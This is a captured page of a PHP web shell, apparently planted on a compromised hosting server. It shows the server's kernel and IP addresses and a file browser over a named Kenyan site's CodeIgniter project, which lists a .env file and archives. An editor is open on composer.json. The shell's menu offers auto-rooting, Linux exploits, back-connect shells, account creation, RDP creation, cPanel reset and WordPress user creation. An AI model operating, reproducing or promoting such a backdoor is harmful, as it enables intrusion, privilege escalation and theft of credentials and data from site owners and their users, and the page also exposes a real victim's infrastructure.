Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.223
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
refferals.tradesense.co.ke /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
agent
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
writable
[ DIR ]
drwxr-xr-x
.env
4.4
KB
-rw-r--r--
.no-header.php-cs-fixer.dist.p...
1.4
KB
-rw-r--r--
.well-known.zip
36.99
MB
-rw-r--r--
CHANGELOG.md
363.99
KB
-rw-r--r--
CONTRIBUTING.md
249
B
-rw-r--r--
LICENSE
1.13
KB
-rw-r--r--
README.md
4.9
KB
-rw-r--r--
SECURITY.md
1.37
KB
-rw-r--r--
TRADESENSE_BROCHURE.pdf
1.52
MB
-rw-r--r--
agent.zip
36.19
MB
-rw-r--r--
composer.json
2.47
KB
-rw-r--r--
composer.lock
172.15
KB
-rw-r--r--
depfile.yaml
5.01
KB
-rw-r--r--
phpstan-baseline.neon.dist
33.38
KB
-rw-r--r--
spark
2.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "codeigniter4/codeigniter4", "type": "project", "description": "The CodeIgniter framework v4", "homepage": "https://codeigniter.com", "license": "MIT", "require": { "php": "^7.3 || ^8.0", "ext-curl": "*", "ext-intl": "*", "ext-json": "*", "ext-mbstring": "*", "kint-php/kint": "^4.0", "laminas/laminas-escaper": "^2.9", "phpmailer/phpmailer": "^6.6", "psr/log": "^1.1" }, "require-dev": { "codeigniter/coding-standard": "1.2.*", "fakerphp/faker": "^1.9", "friendsofphp/php-cs-fixer": "3.2.*", "mikey179/vfsstream": "^1.6", "nexusphp/cs-config": "^3.3", "nexusphp/tachycardia": "^1.0", "phpstan/phpstan": "1.4.3", "phpunit/phpunit": "^9.1", "predis/predis": "^1.1", "rector/rector": "0.12.10" }, "suggest": { "ext-fileinfo": "Improves mime type detection for files" }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true }, "extra": { "branch-alias": { "dev-develop": "4.x-dev" } }, "autoload": { "psr-4": { "CodeIgniter\\": "system/" }, "exclude-from-classmap": [ "**/Database/Migrations/**" ] }, "autoload-dev": { "psr-4": { "CodeIgniter\\": "tests/system/", "Utils\\": "utils/" } }, "scripts": { "post-update-cmd": [ "CodeIgniter\\ComposerScripts::postUpdate", "bash -c \"if [ -f admin/setup.sh ]; then bash admin/setup.sh; fi\"" ], "analyze": "phpstan analyse", "test": "phpunit", "cs": [ "php-cs-fixer fix --verbose --dry-run --diff --config=.no-header.php-cs-fixer.dist.php", "php-cs-fixer fix --verbose --dry-run --diff" ], "cs-fix": [ "php-cs-fixer fix --verbose --diff --config=.no-header.php-cs-fixer.dist.php", "php-cs-fixer fix --verbose --diff" ] }, "scripts-descriptions": { "analyze": "Run static analysis", "test": "Run unit tests", "cs": "Check the coding style", "cs-fix": "Fix the coding style" }, "support": { "forum": "http://forum.codeigniter.com/", "source": "https://github.com/codeigniter4/CodeIgniter4", "slack": "https://codeigniterchat.slack.com" } }
Close